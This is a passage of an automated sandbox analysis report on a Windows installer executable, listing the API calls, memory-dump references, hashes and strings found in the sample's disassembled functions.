                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: CountFileNameTempTick
                                                                          • String ID: "C:\Users\user\Desktop\hnTW5HdWvY.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                          • API String ID: 1716503409-2308823133
                                                                          • Opcode ID: 165f25902c12276048ad14c3faa9af412f6aa489c6d0a6d50344be84ac3f20e0
                                                                          • Instruction ID: 52717d4cd68eb3ad2d5284e259dd09d89c77f45c9904e037c47a6ea27e695b51
                                                                          • Opcode Fuzzy Hash: 165f25902c12276048ad14c3faa9af412f6aa489c6d0a6d50344be84ac3f20e0
                                                                          • Instruction Fuzzy Hash: 24F05E366482086BDB109E56DC44F9A7B98DB95750F14C02AFE44AA180D6B0D9648B99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000000,?), ref: 00402A60
                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9C
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402AA5
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402ACA
                                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: Close$DeleteEnumOpen
                                                                          • String ID:
                                                                          • API String ID: 1912718029-0
                                                                          • Opcode ID: ffc85435ca1e250b947e4d621e093e90361a198f70964f83faf9214d07e34134
                                                                          • Instruction ID: a469cac220e3dfead07ca09df23e0d0f9d1726d397e4729d51af2cb9ca56ac8c
                                                                          • Opcode Fuzzy Hash: ffc85435ca1e250b947e4d621e093e90361a198f70964f83faf9214d07e34134
                                                                          • Instruction Fuzzy Hash: 60116D31A04148FFDF219F90DE48EAF7B79EB44344F104176FA06A01A0D7B49E51AF59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                                                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Timeout
                                                                          • String ID: !
                                                                          • API String ID: 1777923405-2657877971
                                                                          • Opcode ID: e99dd21401efed87dc49a6cbbfa93a04913e4a180baa6c9a590e864f9320e764
                                                                          • Instruction ID: 4b9cb6e92412fb6e6e80457b7b9377e947a39d5b648e27d3fa4f73b4a66c0764
                                                                          • Opcode Fuzzy Hash: e99dd21401efed87dc49a6cbbfa93a04913e4a180baa6c9a590e864f9320e764
                                                                          • Instruction Fuzzy Hash: E321A171A04208AEEF05AFB4CD4AAAE7AB5AB40304F10457AF541B61D1D6B889409718
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 00405B7A: lstrcpynA.KERNEL32(?,?,00000400,0040313B,Profiling Setup,NSIS Error), ref: 00405B87
                                                                            • Part of subcall function 004056A3: CharNextA.USER32(?,?,pivot\drukmaases.kin,?,0040570F,pivot\drukmaases.kin,pivot\drukmaases.kin,?,?,74DF3410,0040545A,?,C:\Users\user\AppData\Local\Temp\,74DF3410,00000000), ref: 004056B1
                                                                            • Part of subcall function 004056A3: CharNextA.USER32(00000000), ref: 004056B6
                                                                            • Part of subcall function 004056A3: CharNextA.USER32(00000000), ref: 004056CA
                                                                          • lstrlenA.KERNEL32(pivot\drukmaases.kin,00000000,pivot\drukmaases.kin,pivot\drukmaases.kin,?,?,74DF3410,0040545A,?,C:\Users\user\AppData\Local\Temp\,74DF3410,00000000), ref: 0040574B
                                                                          • GetFileAttributesA.KERNELBASE(pivot\drukmaases.kin,pivot\drukmaases.kin,pivot\drukmaases.kin,pivot\drukmaases.kin,pivot\drukmaases.kin,pivot\drukmaases.kin,00000000,pivot\drukmaases.kin,pivot\drukmaases.kin,?,?,74DF3410,0040545A,?,C:\Users\user\AppData\Local\Temp\,74DF3410), ref: 0040575B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                          • String ID: pivot\drukmaases.kin
                                                                          • API String ID: 3248276644-360973136
                                                                          • Opcode ID: 62525b7c2a38e913442d275aa1c28f230d0f9bde0bdea29c2ebf83fee8925d4c
                                                                          • Instruction ID: 37b6e5ee433a41c3c1a3ade2b68dfeb55dd06932413cee03f53a9676b214a67c
                                                                          • Opcode Fuzzy Hash: 62525b7c2a38e913442d275aa1c28f230d0f9bde0bdea29c2ebf83fee8925d4c
                                                                          • Instruction Fuzzy Hash: 5DF0AF25119D54A6C726333A1C49B9F1A55CEC3368F58053BF8A0B32D2DB3C8953ADAE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0079FD00,Error launching installer), ref: 00405352
                                                                          • CloseHandle.KERNEL32(?), ref: 0040535F
                                                                          Strings
                                                                          • Error launching installer, xrefs: 00405340
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateHandleProcess
                                                                          • String ID: Error launching installer
                                                                          • API String ID: 3712363035-66219284
                                                                          • Opcode ID: 645e93c5bb495a6f28651f45d9e8b18c91c15bb40d9c9ce812c265225a9d5b21
                                                                          • Instruction ID: 704f217b0c1b6eb60c5a067d09c70ef836417bf4f65591a609eb3a14675a7da7
                                                                          • Opcode Fuzzy Hash: 645e93c5bb495a6f28651f45d9e8b18c91c15bb40d9c9ce812c265225a9d5b21
                                                                          • Instruction Fuzzy Hash: 55E0ECB4A00209BBEB009F64EC0996FBBBCFB04344B048531E910E2250D778E4108AB9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 00405DE5: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\hnTW5HdWvY.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,74DF3410,0040327D), ref: 00405E3D
                                                                            • Part of subcall function 00405DE5: CharNextA.USER32(?,?,?,00000000), ref: 00405E4A
                                                                            • Part of subcall function 00405DE5: CharNextA.USER32(?,"C:\Users\user\Desktop\hnTW5HdWvY.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,74DF3410,0040327D), ref: 00405E4F
                                                                            • Part of subcall function 00405DE5: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,74DF3410,0040327D), ref: 00405E5F
                                                                          • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3410,0040327D), ref: 004030B8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 4115351271-517883005
                                                                          • Opcode ID: 30d046a58fc0be9d4103ba1aeb580eff37f53929913a4ade3c81043231ead311
                                                                          • Instruction ID: ea5cc8e1fe03df48a2deef22c0a6e0afb1540a3998a3053c1cd1c9b1fd1a59a7
                                                                          • Opcode Fuzzy Hash: 30d046a58fc0be9d4103ba1aeb580eff37f53929913a4ade3c81043231ead311
                                                                          • Instruction Fuzzy Hash: 8CD0C92290AD3121D59237663C0AFCF095C9F9735EB019177F419740C65A6D1A8249EF
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 00405E7E: FindFirstFileA.KERNELBASE(?,0079FD48,pivot\drukmaases.kin,0040573B,pivot\drukmaases.kin,pivot\drukmaases.kin,00000000,pivot\drukmaases.kin,pivot\drukmaases.kin,?,?,74DF3410,0040545A,?,C:\Users\user\AppData\Local\Temp\,74DF3410), ref: 00405E89
                                                                            • Part of subcall function 00405E7E: FindClose.KERNEL32(00000000), ref: 00405E95
                                                                          • lstrlenA.KERNEL32 ref: 004021CC
                                                                          • lstrlenA.KERNEL32(00000000), ref: 004021D6
                                                                          • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 004021FE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: FileFindlstrlen$CloseFirstOperation
                                                                          • String ID:
                                                                          • API String ID: 1486964399-0
                                                                          • Opcode ID: 9278265a1d6562d87b158310af3d550ec4f1355b6280d9e33ef3038b74222f92
                                                                          • Instruction ID: d7366e12310d7757e4ed7e6a11b03666cec2b5c10108ed9aa926a5205b7b5eac
                                                                          • Opcode Fuzzy Hash: 9278265a1d6562d87b158310af3d550ec4f1355b6280d9e33ef3038b74222f92
                                                                          • Instruction Fuzzy Hash: E9118271E04308AACB40EFF5C949A9EB7F8AF00308F10853BA501F72C5D6BCD9019759
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 00404E65: lstrlenA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,0078EAA8,007890A8,?,?,?,?,?,?,?,?,?,00402F9E,00000000,?), ref: 00404E9E
                                                                            • Part of subcall function 00404E65: lstrlenA.KERNEL32(00402F9E,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,0078EAA8,007890A8,?,?,?,?,?,?,?,?,?,00402F9E,00000000), ref: 00404EAE
                                                                            • Part of subcall function 00404E65: lstrcatA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00402F9E,00402F9E,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,0078EAA8,007890A8), ref: 00404EC1
                                                                            • Part of subcall function 00404E65: SetWindowTextA.USER32(Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll), ref: 00404ED3
                                                                            • Part of subcall function 00404E65: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EF9
                                                                            • Part of subcall function 00404E65: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F13
                                                                            • Part of subcall function 00404E65: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F21
                                                                            • Part of subcall function 0040532D: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0079FD00,Error launching installer), ref: 00405352
                                                                            • Part of subcall function 0040532D: CloseHandle.KERNEL32(?), ref: 0040535F
                                                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E6C
                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E7C
                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                          • String ID:
                                                                          • API String ID: 3521207402-0
                                                                          • Opcode ID: 5e382bfa05fba0e443e79618048df14a3cf1dcf141c637452d2eeebb68c738d2
                                                                          • Instruction ID: 9699cf0a6c97e1698ecba8eb95fa3f921ed053e19654e9fc7eefe6a52c881a96
                                                                          • Opcode Fuzzy Hash: 5e382bfa05fba0e443e79618048df14a3cf1dcf141c637452d2eeebb68c738d2
                                                                          • Instruction Fuzzy Hash: 77015B31904118EBCF10AFA1D9459AE7B71AB00344F10853BF601B51E0C7B849419FAA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RegOpenKeyExA.KERNELBASE(80000002,00405CA6,00000000,00000002,?,00000002,002AA54D,?,00405CA6,80000002,Software\Microsoft\Windows\CurrentVersion,002AA54D,Exec,00A4C485), ref: 00405A8A
                                                                          • RegQueryValueExA.KERNELBASE(002AA54D,?,00000000,00405CA6,002AA54D,00405CA6), ref: 00405AAB
                                                                          • RegCloseKey.KERNELBASE(?), ref: 00405ACC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID:
                                                                          • API String ID: 3677997916-0
                                                                          • Opcode ID: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                                                          • Instruction ID: c5d279a849dbf4b58f3c41b2e9b5869e935dcf347c73434291752feeb7fa1d0e
                                                                          • Opcode Fuzzy Hash: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                                                          • Instruction Fuzzy Hash: B401487124020AEFDF128F64EC84AEB3FACEF14354F044526F905A6260D235D964CFA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
